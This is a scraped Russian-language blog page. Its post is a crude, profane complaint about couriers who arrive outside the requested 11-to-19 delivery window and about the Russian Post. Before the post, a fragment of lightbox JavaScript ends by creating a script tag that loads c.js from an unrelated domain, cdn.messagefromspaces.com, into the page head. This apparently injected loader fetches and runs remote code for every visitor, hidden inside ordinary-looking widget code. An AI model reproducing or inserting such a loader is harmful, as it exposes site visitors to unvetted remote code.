, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Что-то курьеры всех мастей активизировались и оптимизировались. Вот пишешь в поле «Примечание»: «Прошу доставить мне заказ с 11 до 19». А оптимизированный курьер готов припереться в 9 утра, потому что ему так удобно. Ему не так удобно, на самом деле, просто он долбоёб. И будет ныть, мол, а пораньше можно, не, у меня в центре куча заказов, а потом мне, мудаку, за МКАД далеко-далеко. Куда пораньше-то? Я же не просто так указываю 11 утра. В 11 утра я точно на работе буду, а вот пораньше — ещё тот вопрос.

К «Почте Роисся Вперде», которая вообще ничего не доставляет, добавились вот такие оптимизированные курьеры, которые доставляют не вовремя.

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.